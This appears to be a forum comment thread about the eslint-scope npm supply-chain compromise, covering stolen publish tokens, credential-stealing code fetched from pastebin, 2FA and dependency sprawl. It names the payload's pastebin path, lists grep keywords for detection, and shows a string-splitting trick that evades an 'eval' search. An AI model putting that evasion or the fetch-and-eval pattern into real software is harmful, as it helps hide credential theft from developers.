Can someone instead, make a utility that assuming that my project's packages only get upgraded, not downgraded, could have been compromised or included compromised code? We could then check on each of our projects. If you do downgrade packages then you'd have to run it on prior commits as well.
I would shame an adult who keeps making mistakes that are massively impactful on many others. Given npm's scope within the tech world, there's no way they can be fairly described as a "child". They're a hugely significant entity, and need to act like it.
I think someone needs to audit all versions of all packages on npm. The original eslint maintainer's credentials could have been compromised days ago, via an older version of another module; then the credential stealing code could have been removed in a more recent update.
I've grepped my entire local code base for 'eval' and 'pastebin'; I seem to be fine. But was I fine yesterday? The "^" wildcard is just evil.
And the fallout from this could be incredibly complex. What do you think the original hackers will do with the stolen npm credentials? The paranoid side of me says they are inserting different hacks in any module they can.
> I've grepped my entire local code base for 'eval' and 'pastebin'; I seem to be fine.
I don't know if I'm missing something, but couldn't they have easily called it indirectly like this: console.log(global["ev" + "al"]("40 + 2")); I tested it here: http://rextester.com/FEPVG53848
I think developers need to be much more deliberate about the packages they use and try to have a very small node_modules where it's possible to provide some oversight.
This is not possible under the npm/js paradigm of massive module dependency trees. You'll get a module and it will have 10 dependencies and each of those 10 dependencies will each have 5 dependencies. Three of those at the 4th level was an infected eslint package.
Right! that's what I thought this is left-pad all over again.
Although left-pad was really just a disgruntled publisher... this involves a malicious third party.
My suggestion in fixing the later would be to enforce 2FA for publishing of packages that have so many dependents.
Award a badge to a release when it is published with 2FA. So for LTS releases they can be verified as manually published. This will impact package consumers decision making process, on whether or not to include a dependency into their package.json.
The node package ecosystem is not "designed" to work this way. Everybody is encouraged to use many single purpose packages. The production app I work on at work has over 1000 dependencies. Almost all of them are transitive. (We have maybe 20-30 specified dependencies.)
It's possible to use NPM that way too, I don't think it's "designed" to work in any specific way it just installs what you tell it to.
It's important to be pragmatic about blindly-installed and unreviewed 3rd-party code that can read our ENV.
Those 20 - 30 modules you like could probably each achieve a significant reduction in their dependencies and you probably could too by exploring their alternatives.
The culture of the Node.js ecosystem is to split things into many small packages, so there is no alternative dependencies with a fewer number of dependencies themselves. (This is drastically different than some ecosystems like Go, where dependencies are practically discouraged.) We try to avoid using obscure packages anyway, so even if there was, we'd be choosing between the popular and well tested package to one that was less popular and tested but had less dependencies. This is probably not a tradeoff we'd be willing to make without a lot of trust in the less popular package.
I have never seen NodeJS (or any other) developers advocating to blindly include third-party code in their applications. I think what you are describing is just a side-effect of not considering the ramifications which only works until NPM (or any package manager) starts being exploited.
At least in my experience it's surprisingly difficult to find alternative packages that don't rely on all sorts of (often gratuitous) other dependencies.
It's a mess, I wish I didn't have to associate with the whole ecosystem. I much prefer package managers where you specify an explicit version that you depend on, and have to handle updates yourself - people tell me npm does this now, but I haven't yet seen it work the way I expect it ought to.
Of course that kind of a scheme is much more manageable when dependencies are fewer, chunkier, and slower moving. NPM-land, where running npm install downloads half of the internet for a little web page project, is too far gone beyond the pale.
It's part of the ESLint organization, which is what I'm referring to being compromised, not the exact package.
What you're saying is anyhow wrong as far as I can see. ESLint-scope is included by ESLint. Current version uses ^4.0.0 and shouldn't be affected, but versions from before May has the affected ^3.7.1 dependency.
This version is also included in webpack, making it a big target anyhow.
I always thought it was a little weird for credentials to be put into .npmrc, and this isn't the first time this has caused a problem. Lots of people host their dotfiles publicly, but if you do that with .npmrc you'll (eventually) get an admonishing email from github etc. It really conflicts with the (correct, again) Unix model of separating configuration data from ephemeral data. The creds should be placed in $XDG_CACHE_HOME/npm/ , a directory that already contains lots of ephemeral data for npm. Incidentally that directory and its subdirectories seem to be world-readable by default, which is also stupid.
npm has revoked all access tokens issued before 2018-07-12 12:30 UTC.
If credentials were configuration, we'd be screwed now, because the data we have stored is no longer valid. Fortunately, all we have to do is this:
$ npm adduser
Now the data we have stored is correct again! This is textbook ephemeral data. We can cache it, and that might save some time, but it really doesn't matter. We could flush cache every half hour and it wouldn't hurt a thing.
Another way to see that credentials aren't configuration is what I suggested above: we would never want to back up or publish them, so they are different from and belong in a different place than configuration that we definitely want to back up and often want to publish.
[EDIT:] If one had only considered this from a "12-factor" perspective, in which creds and config are both called config and are both stored in envvars, I could understand the confusion. Note however that the config we're talking about for npm is e.g. "init-author-email". That doesn't change from environment to environment, so it's more like what 12-factor would call code...
This would be a good time to stop what you are doing right now and enable 2FA everywhere you can think of if you haven’t already.
If you control an organisation account enforce it for everyone (github, etc).
I know some places implement it poorly (I’m looking at you SMS based 2FA) but it’s getting to be point where not having it enabled is now a question of when not if you will be compromised. This and Gentoo are recent examples that could have been prevented by 2FA that was available but not enabled.
Not that it’s a bad idea in general, but I don’t think it would help in this situation. I’ve never published NPM packages, but I’m assuming that it only asks for a 2FA token when you first log in, and not every time you publish. Because this thing is stealing local tokens, I think 2FA wouldn’t help.
Possibly not, but it would have prevented the compromise in the first place. My advice was less about helping people affected by this and more about trying to prevent the next one.
I have to wonder if using the same approach as Packagist would be better. In order to upload to packagist you have to link your git repo (GitHub Bitbucket etc) to your Packagist account and sync it that way. The thing npm got wrong here is that you can upload without doing any of that. Seems like that simple step would have prevented this if I’m understanding the chain of events correctly
I don't know, it seems like your SSH key could've been compromised the same way the npm publish token was obtained. So that would only protect those that do not use SSH (or GitHub, which luckily isn't required to publish an npm package) to push.
Perhaps. Though I find that the statistical odds of an ssh key being breached is smaller than spoofing web credentials, thought I could be wrong, my background is not in security. Just anecdotally I actually haven't met anyone that has had their SSH keys hacked/stolen/compromised but I know lots and lots of people, even smart people who use 2 factor for everything, have had something compromised (though I can vividly remember one case where it was 2 factor that saved the day from one of my co-workers having a very nasty identity theft problem. Remember folks, don't ever save a note in your email with your SSN and Drivers License)
Sure this is true. Though the audience of folks that would 1.know what an ssh key is and 2. Know how to generate one I would put better than average odds in on the ssh key not being compromised than any internet account particularly if it does not have 2fa enabled
This is why your SSH key has no business being in the filesystem and should instead be on a hardware token where all the crypto/signing operations happen on the HW token's chip.
> Are they able to hijack stuff all the way down the dependency chain?
Potentially.
Just because you have `eslint` installed as a dependency doesn't mean this exploit ran on your computer. You would have had to run `npm install` (or a similar command) during the infected time (NPM makes it sound like just a few hours).
Details:
This was in `eslint-scope`, an optional dependency of `eslint`.
For this to affect you, you would have needed to run an `npm install`-like command after the infected version of the module was published to `npm` and before it was unpublished.
It's not clear yet if any other modules were infected. Time may tell.
The exploit ran arbitrary code (RCE) after an `npm install` / `npm update` type of command. The payload was a pastebin paste (since neutralized), so to the extent that it could be changed by the author, what the RCE did could have been changed.
NPM has announced that they have disabled the credential-tokens that were issued from a specific time interval, meaning that NPM publishers would have to re-authenticate in order to publish module updates.
Is it possible that this is a npm virus, or semiautomated train of compromises, and the eslint-scope project npm credentials were compromised the same way? Given it was eval-ing code off pastebin, it's hard to tell what has been going on.
They say the package didn't come from their pipeline, so it's most likely published with stolen credentials. So it's not far-fetched to think those credentials were stolen the same way. More packages may be affected.
They did say the pastebin has been taken down, so at least it won't spread further. Still, everybody who ever publishes anything should reset their credentials.
It won't spread further... for this specific package. There's nothing to prove that the virus isn't self-replicating and used a different pastebin/source or mechanism when affecting all packages of authors who've had their credentials compromised, and then authors that install the packages that depend on those packages, etc. When publishing credentials of other package authors have been compromised, the scope could be nearly the entire npm ecosystem.
npm should require all package maintainers to set up 2-Factor Authentication (NOT via sms) and reauthenticate on every update, effective immediately. That's the only fix I can see for this. Libraries are too vulnerable and our current js ecosystem has too many dependencies and too many people in the chain to trust that all of them use secure password practices and none of them have been compromised.
It seems language package manager compromise is becoming an increasingly prevalent attack vector.
IMHO, at some point, the software development industry is going to have to come together and find a way to collectively audit the most widely used packages, considering that the status quo of everyone doing their own auditing is clearly not working. Perhaps a twitter-style 'blue tick' or similar for audited libraries.
Unfortunately in this case, since the source repository itself wasn't compromised, there was nothing to audit (assuming the final bundle was packed/minified).
One interesting mitigation would be for NPM to allow you to bind your package directly to a particular repo. So rather than a user (or job system) having to manually go in and publish releases, NPM could assure that what's live always matches what's in the repo.
I've always wondered, how does apt-get solve this? Do they audit every package?
Yeah, `npm publish` should just – on npm's servers – fetch a github repo and run a build command. This would be more secure, convenient, and less prone to silly errors (like forgetting to build before releasing).
> IMHO, at some point, the software development industry is going to have to come together and find a way to collectively audit the most widely used packages
That will never work. Widespread auditing practices will never solve such problems. What the software development industry should do is move towards capability-secure languages where such attacks are virtually impossible.
Due to sandboxing, the concerns for malicious JS are different from those of C. From what I've seen, bad JS usually tries to record/read and then exfiltrate data, which can only be done through a narrow set of native APIs, which would be comparatively easy to check for.
For sandboxed browser apps, I think the exfiltration problem is not much easier - there are a zillion ways a piece of data can get incorporated into an outgoing xhr or image url. And everything can be monkey-patched. And the code will get transpiled, minified and webpacked etc a zillion times over, all steps which are attractive spots to mess with your code.
Also, it's still easy to detect fetch/XHR/img requests that appear out of nowhere and scrutinize them as points of interest. No matter how much your code is obfuscated and minimized, it still has to go through those APIs. There's no way around that.
Actually there is the famiar bestiary of side-channels available (eg timing, traffic modulation), along with web-specific ones (cookies, dns, non-http protocols such as webrtc, etc).
Also, fields in XHR payloads are frequently not human-readable.
Even discounting the above - scrutinizing the XHR payloads with a suspicious eye is in any event labour-intensive expert work. It happens once in a blue moon in security audits, and has a fairly low detection rate given the amount of inherently malware-like behaviour that most commercial web apps incorporate (eg img-tags used to carry tracker payloads is routine behaviour from google and facebook, and iframes used to embed terrible things).
Maybe sandbox is the wrong technical term, but JS as a language runs with constraints. It can't manipulate pointers, mainly. As far as I know there's no such thing as a buffer-overflow attack in the context of Node.js.
If the malicious JS code is already running in node, there is no need to exploit a RCE bug.
edit: to expand, an underhanded js bug might be a path traversal bug, xss bug, leak of session cookies - any of the familiar js security bugs that occur as honest mistakes too.
(But while on the subject, Node API's are historically quite unsafe and do have lots of memory safety vulns, search results are in 3 digits in the issue tracker for queries like segfault. Node API's are not really written with hostile code in mind.)
This is why I do all of my development in VMs now. I can’t abandon Node, because that’s the current trend in web development, so i just try to avoid the most common viruses that don’t include a VM-breakout zero day.
According to the thread, as of about 30 minutes ago the malicious version has been unpublished.
Despite this, it seems that a lot of high profile packages were vulnerable to an automatic minimum version bump. There have been quite a few close calls with non packages, and at some point I feel like it will actually do some damage.
The indirect dependencies thing is a real problem, for other reasons too, because you can't control those. The peer dependency system partially solves this, but it's still an issue.
Note that NPM claims they already disabled NPM access tokens that were used during the timeframe they assigned to this incident so if you were affected, your token was already revoked.
Also, ESLint's postmortem[1] suggests this was password reuse (matching a creds from a previously popped service) + lack of 2FA. In short, a failure of a developer with publish permissions to use basic security hygiene.
Why go through the effort of evalin' the result of pastebin.com/raw/XLeVP82h? Why not just put the resulting code from pastebin directly into the suspicious file?
probably the most reasonable stopgap to this class of attacks is for npm to do more to encourage 2FA, with badges, etc, and introduce a warning on non-2FA installs.
One of the notes on the ESLint postmortem[1] was that developers shouldn't reuse passwords and should use a password manager to facilitate making this easier.
While I ack that 2FA would have prevented this incident, so would have using unique credentials. Note that using unique credentials is available at every SaaS service, not just the ones that support 2FA.
It's not completely resolved until everybody who was potentially compromised audits everything their credentials gave them control over and changes the credentials.
Is a bug not fully resolved until every machine on the planet running that software has upgraded to a version in which the bug doesn't exist? That'd be quite a silly assertion imho.
I mean sure, the turn-around time is great...but how did this pass review in the first place? This should never happen in a reasonably managed project.
It wasn't up for review. It was published out of band, and outside of the ESLint pipeline using likely stolen credentials. That's how that stuff sneaks in.
The CVE DB is usually pretty backlogged. This[1] is the defacto NPM "CVE DB" and describes the two modules[2][3] affected by this incident that ESLint and NPM acknowledge.
Another great reason to not go with gigantic libraries / toolchains / transpilation. Use small code you can read, rather than something like Babel/JSX/React.
The size doesn't matter. Just including a single JQuery-like library from a fake CDN could get you similarly pwn your supply chain.
If you use other peoples' code and you don't {static analyze it, dynamic analyze it, sandbox+scrutinize its network traffic it until you are confident it doesn't phone home, reverse engineer all of the binaries, etc} you can get hit by the same issue.
Exactly. Don't use other people's code / depend on their code / services.
But you're wrong about size. It matters. If your code is small enough you host it yourself rather than relying on external CDNs. Risk surfaced reduced. And smaller code mindset leads to less use of dependencies / bloatware like the React/Babel tool chain, so of course this leads to less risk.
But it also makes fools of a lot of people and conventional/fad wisdom, so I'm unsurprised they're unhappy to hear it.
Why the flagnar do hardcore believers/users of Node insist that everything is perfect with their package management; let alone any of the bad programming practices that Node idolizes?
This is what... the 4th major incident in the last 6 months with Node and npm.
Anyone who tells me they use Node will instantly get put on their own sandbox and vlan. You just can't trust that the code they run is legit, even if they wrote it.